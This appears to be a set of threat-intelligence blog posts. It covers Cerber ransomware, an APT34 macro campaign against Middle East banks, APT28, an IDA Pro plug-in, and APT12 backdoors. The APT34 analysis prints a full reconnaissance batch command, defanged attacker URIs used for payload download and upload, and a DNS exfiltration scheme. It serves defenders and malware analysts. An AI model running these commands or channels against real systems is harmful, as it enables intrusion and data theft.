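        if lowered in SANDBOX_PATHS or any(f in lowered for f in SANDBOX_PATH_FRAGMENTS):
            findings.append(("path", path))
    if snapshot.get("volume_serial", "").upper() in SANDBOX_SERIALS:
        findings.append(("volume_serial", snapshot["volume_serial"]))
    return findings
```

Note that dbghelp.dll is also a legitimate Windows module, so a real audit would weigh that entry differently from the unambiguous sandbox names.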

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” AutoRun key value is changed to point to the Cerber payload so that the malware is launched each time the Windows command processor, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods, such as the Run and RunOnce keys, are also used.
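A defender can sweep for these persistence points by comparing autorun-style values against an allowlist. The registry value names below match the mechanisms described above; the snapshot dictionary is a simplified, hypothetical stand-in for data gathered from a live endpoint.

```python
# The value names mirror the persistence points described above; the
# snapshot is a simplified, hypothetical stand-in for live registry data.
WATCHED_AUTORUNS = (
    r"HKCU\Control Panel\Desktop\SCRNSAVE.EXE",
    r"HKCU\Software\Microsoft\Command Processor\AutoRun",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce",
)

def suspicious_autoruns(snapshot: dict, allowlist: set):
    """Return (value, target) pairs pointing at binaries not on the allowlist."""
    return [(value, target) for value, target in snapshot.items()
            if value in WATCHED_AUTORUNS and target.lower() not in allowlist]
```

A target under %APPDATA%\<GUID> or the user's startup folder that is not on the allowlist is exactly the pattern this campaign left behind.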

A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections, or they may not be practical for your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between discrete individual processes that may be steps in an attack. That takes behavioral intelligence that can quickly analyze a wide array of processes and alert on them, so analysts and security teams can conduct a complete investigation into what has transpired or is transpiring. This can only be done if those professionals have the right tools and visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real time. At FireEye, we also go one step further and contact the relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Targeted Attacks against Banks in the Middle East

UPDATE (Dec. 8, 2017): We now attribute this campaign to APT34, a suspected Iranian cyber espionage threat group that we believe has been active since at least 2014. Learn more about APT34 and their late 2017 targeting of a government organization in the Middle East.


In the first week of May 2016, FireEye’s DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region. The threat actors appear to be performing initial reconnaissance against would-be targets, and the attacks caught our attention since they were using unique scripts not commonly seen in crimeware campaigns.

In this blog we discuss in detail the tools, tactics, techniques and procedures (TTPs) used in these targeted attacks.

Delivery Method

The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East. The themes of the messages were related to IT infrastructure, such as a server status report log or a list of Cisco IronPort appliance details. In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks. This email was then forwarded to several people, with the malicious Excel file attached.

Macro Details

The macro first calls an Init() function (shown in Figure 1) that performs the following malicious activities:

  1. Extracts base64-encoded content from the cells within a worksheet titled "Incompatible".
  2. Checks for the presence of a file at the path %PUBLIC%\Libraries\update.vbs. If the file is not present, the macro creates three different directories under %PUBLIC%\Libraries, namely up, dn, and tp.
  3. The extracted content from step one is decoded using PowerShell and dropped into two different files: %PUBLIC%\Libraries\update.vbs and %PUBLIC%\Libraries\dns.ps1
  4. The macro then creates a scheduled task with name: GoogleUpdateTaskMachineUI, which executes update.vbs every three minutes.

Note: Due to the use of a hardcoded environment variable %PUBLIC% in the macro code, the macro will only run successfully on Windows Vista and subsequent versions of the operating system.

Figure 1: Macro Init() subroutine
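One triage angle suggested by this behavior: a scheduled task whose name mimics a software updater (here, GoogleUpdateTaskMachineUI) but whose action points into a user-writable directory deserves scrutiny. The heuristic and path fragments below are illustrative additions, not from the original analysis.

```python
# Illustrative heuristic: updater-style scheduled tasks normally run from
# Program Files, not from user-writable paths like %PUBLIC%\Libraries.
USER_WRITABLE_FRAGMENTS = ("%public%", "\\users\\public\\", "\\appdata\\", "%temp%")

def task_action_is_suspect(action: str) -> bool:
    lowered = action.lower()
    return any(frag in lowered for frag in USER_WRITABLE_FRAGMENTS)

print(task_action_is_suspect(r"%PUBLIC%\Libraries\update.vbs"))                    # True
print(task_action_is_suspect(r"C:\Program Files\Google\Update\GoogleUpdate.exe"))  # False
```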

Run-time Unhiding of Content

One of the interesting techniques we observed in this attack was the display of additional content after the macro executed successfully. This was done for the purpose of social engineering – specifically, to convince the victim that enabling the macro did in fact result in the “unhiding” of additional spreadsheet data.

Office documents containing malicious macros are commonly used in crimeware campaigns. Because default Office settings typically require user action in order for macros to run, attackers may convince victims to enable risky macro code by telling them that the macro is required to view “protected content.”

In crimeware campaigns, we usually observe that no additional content is displayed after enabling the macros. However, in this case, attackers took the extra step to actually hide and unhide worksheets when the macro is enabled to allay any suspicion. A screenshot of the worksheet before and after running the macro is shown in Figure 2 and Figure 3, respectively.

Figure 2: Before unhiding of content

Figure 3: After unhiding of content

In the following code section, we can see that the subroutine ShowHideSheets() is called after the Init() subroutine executes completely:

Private Sub Workbook_Open()
    Call Init

        Call ShowHideSheets
End Sub

The code of subroutine ShowHideSheets(), which unhides the content after completion of malicious activities, is shown in Figure 4.

Figure 4: Macro used to unhide content at runtime

First Stage Download

After the macro successfully creates the scheduled task, the dropped VBScript, update.vbs (Figure 5), will be launched every three minutes. This VBScript performs the following operations:

  1. Leverages PowerShell to download content from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\dwn&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  2. Uses PowerShell to download a BAT file from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\bat&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  3. Executes the BAT file and stores the results in a file in the path %PUBLIC%\Libraries\up.
  4. Uploads this file to the server by sending an HTTP POST request to the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\upl&m=u.
  5. Finally, it executes the PowerShell script dns.ps1, which is used for the purpose of data exfiltration using DNS.

Figure 5: Content of update.vbs

During our analysis, the VBScript downloaded a customized version of Mimikatz in the previously mentioned step one. The customized version uses its own default prompt string as well as its own console title, as shown in Figure 6.

Figure 6: Custom version of Mimikatz used to extract user password hashes

Similarly, the contents of the BAT file downloaded in step two are shown in Figure 7:

whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1

Figure 7: Content of downloaded BAT script

This BAT file is used to collect important information from the system, including the currently logged on user, the hostname, network configuration data, user and group accounts, local and domain administrator accounts, running processes, and other data.

Data Exfiltration over DNS

Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel. This was likely done because DNS is required for normal network operations. The DNS protocol is unlikely to be blocked (allowing free communications out of the network) and its use is unlikely to raise suspicion among network defenders.

The script dns.ps1, dropped by the macro, is used for this purpose. In the following section, we describe its functionality in detail.

  1. The script requests an ID (through the DNS protocol) from go0gIe[.]com. This ID will then be saved into the PowerShell script.
  2. Next, the script queries the C2 server for additional instructions. If no further actions are requested, the script exits and will be activated again the next time update.vbs is called.
  3. If an action is required, the DNS server replies with an IP with the pattern 33.33.xx.yy. The script then proceeds to create a file at %PUBLIC%\Libraries\tp\chr(xx)chr(yy).bat. The script then proceeds to make DNS requests to fetch more data. Each DNS request results in the C2 server returning an IP address. Each octet of the IP address is interpreted as the decimal representation of an ASCII character; for example, the decimal number 99 is equivalent to the ASCII character ‘c’. The characters represented by the octets of the IP address are appended to the batch file to construct a script. The C2 server signals the end of the data stream by replying to a DNS query with the IP address
  4. Once the file has been successfully transferred, the BAT file will be run and its output saved as %PUBLIC%\Libraries\tp\chr(xx)chr(yy).txt.
  5. The text file containing the results of the BAT script will then be uploaded to the DNS server by embedding file data into part of the subdomain. The format of the DNS query used is shown in Table 1.
  6. The BAT file and the text file will then be deleted. The script then quits, to be invoked again upon running the next scheduled task.
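The file-transfer step above can be reversed by an analyst who has captured the DNS answers: each octet of a returned IP address is an ASCII code, so concatenating octets rebuilds the transferred script. A minimal decoder sketch follows; the sample answers are made up, and treating zero octets as padding is an assumption.

```python
# Decoder sketch for the channel described above: each DNS answer is an
# IP address whose octets are ASCII codes; concatenating them rebuilds
# the transferred batch file. The sample answers below are made up.
def decode_ip_stream(ip_answers):
    chars = []
    for ip in ip_answers:
        for octet in ip.split("."):
            code = int(octet)
            if code:                # assumption: zero octets pad the final answer
                chars.append(chr(code))
    return "".join(chars)

print(decode_ip_stream(["119.104.111.97", "109.105.0.0"]))  # -> "whoami"
```

Replaying captured answers through a decoder like this lets responders see exactly which commands the C2 pushed to a host.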

The DNS communication portion of the script is shown in Figure 8, along with a table showing the various subdomain formats being generated by the script.

Figure 8: Code Snippet of dns.ps1

Format of subdomains used in DNS C2 protocol:

Subdomain used to request for BotID, used in step 2 above

[00][botid]00000[base36 random number]30

Subdomain used while performing file transfers used in step 3 above

[00][botid]00000[base36 random number]232A[hex_filename][i-counter]

Subdomain used while performing file upload, used in step 5 above

[00][botid][cmdid][partid][base36 random number][48-hex-char-of-file-content]

Table 1: C2 Protocol Format
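Of these formats, the upload subdomain is the most mechanically recoverable: its last 48 hexadecimal characters encode 24 bytes of file content. The reassembly sketch below assumes labels arrive in order and decodes only that fixed-width tail, since the widths of the leading fields are not specified here.

```python
import binascii

def recover_uploaded_file(subdomain_labels):
    """Concatenate the 24 bytes carried in each label's 48-hex-char tail.

    Assumes labels are supplied in transmission order; the leading fields
    (botid, cmdid, partid, random number) are left unparsed because their
    widths are not specified in Table 1.
    """
    data = b""
    for label in subdomain_labels:
        data += binascii.unhexlify(label[-48:])
    return data
```

In an investigation, sorting captured queries by their partid field (once its width is known for a given sample) would restore the original upload even if packets were logged out of order.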


Although this attack did not leverage any zero-days or other advanced techniques, it was interesting to see how attackers used different components to perform reconnaissance activities on a specific target.

This attack also demonstrates that macro malware is effective even today. Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

The Consistency of Plastique

As I said in my last post I have been travelling quite extensively recently, but this weekend I was able to take a long weekend in Oslo with my wife just before the Nordic CSA Summit where I was invited to speak on “the CISO Perspective”. As a gift for speaking, each of us was … Read More

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal by releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.

A Threatening Threat Map

FireEye recently released a ThreatMap to visualize some of our Threat Intelligence Data.

The ThreatMap data is a sample of real data collected from our two-way sharing customers for the past 30 days. The data represented in the map is malware communication to command and control (C2) servers, where the "Attackers" represent the location of the C2 servers and "Targets" represent customers.

To mask customer identity, locations are represented as the center of the country in which they reside. There is nothing in the data that can be used to identify a customer or their origin city. The "attacks today" counter is not a real-time count. Rather, we take a real, observed attack rate and then calculate attacks for the day based on local time.

One of the biggest challenges with the ThreatMap was how to display this information in a consumable way. If all attacks were shown at the rate they occur, the map would be incomprehensible and full of lines. To solve this, we randomly select which lines to display from our dataset at a rate that results in the best viewing experience. The random selection helps a user see which areas are targeted more and which APT families target specific regions.

So how does FireEye use this information? We use it to understand patterns and further our threat intelligence. It lets us see trends over time as well as by malware family or threat actor.

For instance, it lets us examine whether a particular threat actor – say APT1 – is using a particular set of IP addresses, domain names, and URLs to launch their attacks. Based on the type of malware being used, it also lets us attribute the malware, and hence the source of these attacks, to particular threat actors. It allows us to combine the strategic threat intelligence we have gained from more than 10 years of responding to the largest breaches with the tactical indicators of compromise we see in the millions every day from our virtual machine-based sensors deployed across the globe. Connecting these dots allows us to create the eye-catching graphic but, more importantly, it also lets us take the fight to the attacker by understanding and uncovering their tactics, techniques and procedures, which ultimately lets us serve our mission of better protecting our customers.

Double-edged Sword: Australia Economic Partnerships Under Attack from China

During a visit in mid-September, China’s Foreign Minister Wang Yi urged Australia to become “a bridge between east and west.” He was Down Under to discuss progress on the free trade agreement between Australia and China that seems likely by the end of the year. His comment referred to furthering the trade relationship between the two countries, but he might as well have been referring to hackers who hope to use the deepening alliance to steal information.

The Australian Financial Review (AFR) did an in-depth article with FireEye regarding Chinese attacks against Australian businesses, and this blog provides additional context.

Australia has experienced unprecedented trade growth with China over the last decade, which has created a double-edged sword. As Australian businesses partner with Chinese firms, China-based threat actors increasingly launch sophisticated and targeted network attacks to obtain confidential information from Australian businesses. In the U.S. and Europe, Chinese attacks on government and private industry have become routine news in local papers. Australia, it seems, is the next target.

The Numbers

First, let’s review the state of Australian and Chinese economic interdependence. Averaging an annual 9.10% GDP growth rate over the last two decades, China’s unparalleled economic expansion has shielded Australia from the worst effects of the global financial crisis. Exports to China have increased tenfold, from $8.3b USD in 2001 to $90b USD in 2013[i], with the most prominent commodities being iron ore and natural gas. Many of these resources originate in Australia, which puts China’s government under significant pressure to meet the skyrocketing demand for them. Despite the ever-increasing co-dependence Australia and China share as regional partners, Chinese authorities are likely supporting greater levels of monitoring and intelligence gathering against the Australian economy, often conducted through Chinese State-Owned Enterprises (SOEs) with domestic relationships in Australia.

SOE direct investment grew to 84% of all foreign investment inflows from China to Australia in 2014, primarily directed into the Australian mining and resource sector. This is a further signal of China's drive for control as it seeks certainty in catering for its future internal growth. We suspect government-commissioned cyber threat actors are targeting Australian firms with a specific agenda: to gain advantage over, and control of, assets in both physical infrastructure and intellectual property.


Figure 1. Chinese Direct Investment into Australia by industry

The Impacts

How have these partnerships impacted Australian networks? Mandiant has observed the strategic operations of Chinese threat actors targeting companies involved in key economic sectors, including data theft from an Australian firm. Chinese Advanced Persistent Threats (APTs) are likely interested in compromising Australian mining and natural resources firms, especially after spikes in commodity prices. The upward trend in APT attacks from China is also aimed toward third parties in the mining and natural resources ecosystems. Mandiant has observed a significant increase in China-based APT intrusions focused on law firms that hold confidential mergers and acquisitions information and sensitive intellectual property. It is no coincidence that these third-party firms are often found lacking in network protections. The investigation also found that, at the time of compromise, the majority of victim firms were in direct negotiations with Chinese enterprises, highlighting attempts by the Chinese government to gain advantage in targeted areas.

Due to its endemic pollution problems, clean energy has evolved into a critical industry for China, and the country has engaged a plan to develop Strategic Emerging Industries (SEIs) to address this. Australian intellectual property and R&D have become prime targets and now feature prominently in Chinese APT campaigns. Again, it is third parties like law firms that are coming under attack.

Furthermore, to reduce China’s reliance on Australian iron ore exports, Beijing has initiated a plan to develop an efficient, high-end steel production vertical through strategic acquisitions in Australia and intervening to prevent unfavorable alliances.  For example, the SOE Chinalco bought into Australian mining companies to presumably prevent a merger that would have disadvantaged their interests. Clearly, the confidential business information of Australian export partners to China is becoming increasingly sought after.

Mandiant found that the majority of compromised firms either had negotiations with Chinese enterprises under way or had previous business engagements with Chinese enterprises. These attacks will persist as trade and investment grows, and they will come at the cost of confidential Australian business information such as R&D and intellectual property. As large Australian mining and resources firms themselves may partner with the Australian Signals Directorate for security, the focus of the threat actors shifts to associated parties with access to sensitive data who may not be pursuing such partnerships. This calls for greater awareness of, and protection against, the increasingly determined and advanced attacks being launched.

The Bottom Line

Although this blog focuses on attacks against the large Australian mining and resources sectors, Mandiant has observed these APT actors also focusing their attention on other sectors such as defence, telecommunications, agriculture, political organizations, high technology, transportation, and aerospace, among others. But the broader lesson, drawing from U.S. and European experience with Chinese attacks, is that no one is or will be exempt.  For all Australian businesses and governments, it’s time to fortify defences for a new era of cyber security.


[i] Australian Government Department of Foreign Affairs and Trade.


FLARE IDA Pro Script Series: MSDN Annotations Plug-in for Malware Analysis

The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts from our public repository. We hope you find all these scripts as useful as we do.

During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it.

The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files.

Table 1 shows the benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments get pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument, and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would have to research the respective argument, import the corresponding standard enumeration into IDA, and then manually rename each value. The right side of Table 1 shows the result of executing our plug-in and the support it offers to an analyst.

The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly.


Table 1: Automatic labelling of standard symbolic constants
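The constant renaming shown in Table 1 is essentially a lookup from raw immediate values to documented symbolic names. As a rough illustration (using the documented Windows GENERIC_* access-right values; this helper is our own sketch, not the plug-in's actual code):

```python
# Documented Windows generic access-right values (winnt.h).
GENERIC_FLAGS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}

def label_access_mask(value):
    """Return the symbolic names set in a dwDesiredAccess mask,
    e.g. 0x40000000 -> "GENERIC_WRITE"; unknown values stay hex."""
    names = [name for flag, name in GENERIC_FLAGS.items() if value & flag]
    return " | ".join(names) if names else hex(value)
```

In the plug-in itself this mapping comes from IDA's standard enumerations rather than a hard-coded table, so it covers far more constants than this sketch.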

In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over the automatically renamed constant for dwShareMode displays descriptive information.

Figure 1: Hovering over function names, arguments, and constants displays the respective descriptions


How it works


Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong.
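Conceptually, this backup step is just a file copy placed next to the database before any markup changes are made. A minimal sketch (the `.bak` naming here is an assumption for illustration, not necessarily the plug-in's own scheme):

```python
import shutil

def backup_database(idb_path: str) -> str:
    """Copy the IDA database file alongside itself before modifying it,
    so the analyst can revert if the automated markup goes wrong."""
    dst = idb_path + ".bak"  # hypothetical naming convention
    shutil.copyfile(idb_path, dst)
    return dst
```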

The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files. For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup.


Figure 2: Annotated import table

Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary.


Figure 3: The additional segment added to the IDA database

The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment.


Figure 4: Names and comments inserted for argument descriptions

To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA.


Figure 5: Descriptions added to the constant enumeration members


Preparing the MSDN database file


The plug-in’s graphical interface requires you to have the Qt framework and Python scripting installed. This is included with the IDA Pro 6.6 release; it can also be set up for IDA 6.5.

As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file; it can be cloned from our git repository together with the annotation plug-in.
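The generated database is plain XML, so consuming it amounts to walking elements and pulling out names and descriptions. The snippet below sketches that idea; the element names here are assumptions for illustration, since the real schema is defined by the generated database file itself:

```python
import xml.etree.ElementTree as ET

# Hypothetical fragment in the spirit of the generated database;
# the actual schema may differ.
SAMPLE = """
<msdn>
  <function>
    <name>CreateFileA</name>
    <description>Creates or opens a file or I/O device.</description>
  </function>
</msdn>
"""

def load_function_descriptions(xml_text):
    """Map API function names to their documentation strings."""
    root = ET.fromstring(xml_text)
    return {f.findtext("name"): f.findtext("description")
            for f in root.iter("function")}
```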

You can take the following steps to set up the database file. You only have to do this once.



  1. Download and install an offline version of the MSDN documentation. The Microsoft Windows SDK MSDN documentation is available as a standalone installer. Although it is not the newest SDK version, it includes all the needed information, and data extraction is straightforward. As shown in Figure 6, you can choose to install only the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033.



    Figure 6: Installing a local copy of the MSDN documentation


  2. Extract the files with an archive manager like 7-zip to a directory of your choice.
  3. Download and extract tilib.exe from Hex-Rays’ download page.


    To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents; it is available via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is working correctly.

  4. Run the MSDN_crawler script with the following arguments: <path to extracted MSDN documentation> <path to tilib.exe> <path to til files>



    With these prerequisites fulfilled, you can run the script, located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution the final XML database file should be located in the MSDN_data directory.



You can now run our plug-in to annotate your disassembly in IDA.

Running the MSDN annotations plug-in

In IDA, use File - Script file... (ALT + F7) to open the annotation script. This displays the dialog box shown in Figure 7, which allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions and arguments and renames constants. If you change the settings and execute the plug-in by clicking OK, your settings are stored in a configuration file in the plug-in’s directory, so you can quickly run the plug-in on other samples using your preferred settings. If you choose not to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over those elements.


Figure 7: The plug-in’s configuration window showing the default settings

When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8.


Figure 8: The plug-in’s preview of function annotations with repeatable comments


Similar Tools and Known Limitations


Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer which greatly supported our development.

Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms. Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element.

For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1.


<?xml version="1.0" encoding="ISO-8859-1"?>
<constants enums="MACRO_GENERIC">
  <description>All possible access rights</description>
  <description>Execute access</description>
  <description>Write access</description>
  <description>Read access</description>

Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function

In this post, we showed how you can generate an MSDN database file used by our plug-in to automatically annotate IDA Pro’s disassembly with information about functions, arguments, and constants. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process!

Stay tuned for the FLARE Team’s next post, where we will release solutions for the FLARE On Challenge.


Darwin’s Favorite APT Group


The attackers referred to as APT12 (also known as IXESHE, DynCalc, and DNSCALC) recently started a new campaign targeting organizations in Japan and Taiwan. APT12 is a cyber espionage group believed to have links to the Chinese People's Liberation Army, and its targets are consistent with larger People's Republic of China (PRC) goals. Intrusions and campaigns conducted by this group are in line with PRC goals and self-interest in Taiwan. Additionally, the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure, as APT12 used the same strategy after compromising the New York Times in October 2012. Much like Darwin’s theory of biological evolution, APT12 has been forced to evolve and adapt in order to maintain its mission.

The new campaign marks the first APT12 activity publicly reported since Arbor Networks released their blog “Illuminating The Etumbot APT Backdoor.” FireEye refers to the Etumbot backdoor as RIPTIDE. Since the release of the Arbor blog post, FireEye has observed APT12 use a modified RIPTIDE backdoor that we call HIGHTIDE. This is the second time FireEye has discovered APT12 retooling after a public disclosure. As such, FireEye believes this to be a common theme for this APT group, as APT12 will continue to evolve in an effort to avoid detection and continue its cyber operations.

FireEye researchers also discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT. Both backdoors were dropped from malicious documents built utilizing the “Tran Duy Linh” exploit kit, which exploited CVE-2012-0158. These documents were also emailed to organizations in Japan and Taiwan. While APT12 has previously used THREEBYTE, it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE. Similarly, WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified. However, the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12.


From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server. RIPTIDE’s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication.


Figure 1: RIPTIDE HTTP GET Request Example
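As described above, RIPTIDE fetches an RC4 key and then encrypts all further C2 traffic with it. For reference, textbook RC4 is symmetric, so the same routine that encrypts a beacon will decrypt captured traffic once the key is recovered (the key bytes below are purely illustrative):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are identical."""
    # Key-scheduling algorithm
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm, XORed over the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```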

In June 2014, Arbor Networks published an article describing the RIPTIDE backdoor and its C2 infrastructure in great depth. The blog highlighted that the backdoor was utilized in campaigns from March 2011 until May 2014.

Following the release of the article, FireEye observed a distinct change in RIPTIDE’s protocols and strings. We suspect this change was a direct result of the Arbor blog post in order to decrease detection of RIPTIDE by security vendors. The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules. FireEye dubbed this new malware family HIGHTIDE.

HIGHTIDE Malware Family

On Sunday, August 24, 2014, we observed a spear-phishing email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese government employee, implying that it was sent from a valid but compromised account.



Figure 2:  APT12 Spearphishing Email

The exploit document dropped the HIGHTIDE backdoor with the following properties:

